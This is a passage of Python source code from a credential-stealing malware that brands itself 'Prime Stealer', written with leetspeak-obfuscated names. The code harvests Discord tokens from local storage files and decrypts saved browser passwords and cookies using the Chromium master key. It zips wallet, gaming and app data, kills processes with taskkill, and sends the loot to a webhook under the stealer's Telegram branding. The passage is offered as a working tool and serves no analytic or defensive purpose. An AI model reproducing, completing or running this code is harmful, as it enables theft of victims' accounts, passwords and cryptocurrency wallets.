def g3770K3N(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for token in re.findall(regex, line):
global T0K3Ns
if CH3CK70K3N(token):
if not token in T0K3Ns:
# print(token)
T0K3Ns += token
UP104D70K3N(token, path)
P455w = []
def g37P455W(path, arg):
global P455w, P455WC0UNt
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "p" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in k3YW0rd:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in p45WW0rDs: p45WW0rDs.append(old)
P455w.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3CrYP7V41U3(row[2], master_key)}")
P455WC0UNt += 1
wr173F0rF113(P455w, 'passw')
C00K13s = []
def g37C00K13(path, arg):
global C00K13s, C00K1C0UNt
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "p" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in k3YW0rd:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in c00K1W0rDs: c00K1W0rDs.append(old)
C00K13s.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3CrYP7V41U3(row[2], master_key)}")
C00K1C0UNt += 1
wr173F0rF113(C00K13s, 'cook')
def G37D15C0rD(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
# print(path, master_key)
for file in os.listdir(pathC):
# print(path, file)
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines()if x.strip()]:
for token in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0K3Ns
tokenDecoded = D3CrYP7V41U3(b64decode(token.split('dQw4w9WgXcQ:')[1]), master_key)
if CH3CK70K3N(tokenDecoded):
if not tokenDecoded in T0K3Ns:
# print(token)
T0K3Ns += tokenDecoded
# writeforfile(Tokens, 'tokens')
UP104D70K3N(tokenDecoded, path)
def G47H3rZ1P5(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1P7H1N65, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1P7H1N65, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=Z1P73136r4M, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global W411375Z1p, G4M1N6Z1p, O7H3rZ1p
# print(WalletsZip, G4M1N6Z1p, OtherZip)
wal, ga, ot = "",'',''
if not len(W411375Z1p) == 0:
wal = "<:NewProject1:1224191662960410715> • Wallets\n"
for i in W411375Z1p:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(W411375Z1p) == 0:
ga = "<:computerr:1164189052472393798> • Gaming\n"
for i in G4M1N6Z1p:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(O7H3rZ1p) == 0:
ot = "<:ticket1:1247312767971622992> • Apps\n"
for i in O7H3rZ1p:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": g108411NF0(),
"embeds": [
{
"title": "Prime Stealer | Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": color,
"footer": {
"text": "Prime Stealer | t.me/PrimeStealer Made By Prime",
"icon_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204"
}
}
],
"username": "Prime Stealer | t.me/PrimeStealer",
"avatar_url": "https://media.discordapp.net/attachments/1216499065521700987/1216500554612867082/prime.png?ex=66009d6d&is=65ee286d&hm=a868ad4bd7cc30d12008971650d2bd4745e9a80158b183dd2e60c7e9035ca1cf&=&format=webp&quality=lossless&width=204&height=204",
"attachments": []
}
L04DUr118(hook, data=dumps(data).encode(), headers=headers)
def Z1P73136r4M(path, arg, procc):
global O7H3rZ1p
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")